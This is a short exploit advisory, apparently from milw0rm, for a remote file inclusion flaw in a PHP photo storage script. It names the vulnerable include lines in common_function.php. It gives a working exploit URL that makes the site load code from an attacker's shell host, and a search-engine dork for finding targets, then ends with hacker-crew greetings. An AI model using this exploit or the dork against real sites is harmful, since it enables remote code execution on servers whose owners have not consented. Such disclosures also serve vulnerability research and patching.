35 lines
No EOL
1.4 KiB
Text
35 lines
No EOL
1.4 KiB
Text
########################################################################
|
|
# magic photo storage website -- Remote File Inclusion
|
|
# Vendor : http://www.scriptaty.net/magic-photo-storage-website.html
|
|
# Demo Site : http://www.turnkeydemos.info/demo/picstorage/
|
|
# Found By : k1tk4t - k1tk4t[4t]newhack.org
|
|
# Location : Indonesia -- #newhack[dot]org @irc.dal.net
|
|
########################################################################
|
|
file;
|
|
common_function.php
|
|
|
|
bug;
|
|
require_once $_config['site_path'] . '/class/session.class.php';
|
|
require_once $_config['site_path'] . '/class/validator.class.php';
|
|
require_once $_config['site_path'] . '/include/message.php';
|
|
########################################################################
|
|
exploit;
|
|
http://localhost/include/common_function.php?_config[site_path]=http://shell
|
|
########################################################################
|
|
Dork;
|
|
allinurl:catalog_login.php
|
|
########################################################################
|
|
Thanks;
|
|
str0ke
|
|
xoron [www.xoron.biz]
|
|
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159
|
|
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
|
|
home_edition2001,matdhule,iFX,fusion
|
|
and for all(friend's&enemy)
|
|
@irc.dal.net
|
|
#newhack[dot]org [all member&staff]
|
|
#e-c-h-o [all member echo community]
|
|
#asiahacker [all member asiahacker community]
|
|
#nyubicrew [all member solpotcrew community] <-- at irc.komp-uter.org
|
|
|
|
# milw0rm.com [2007-01-08] |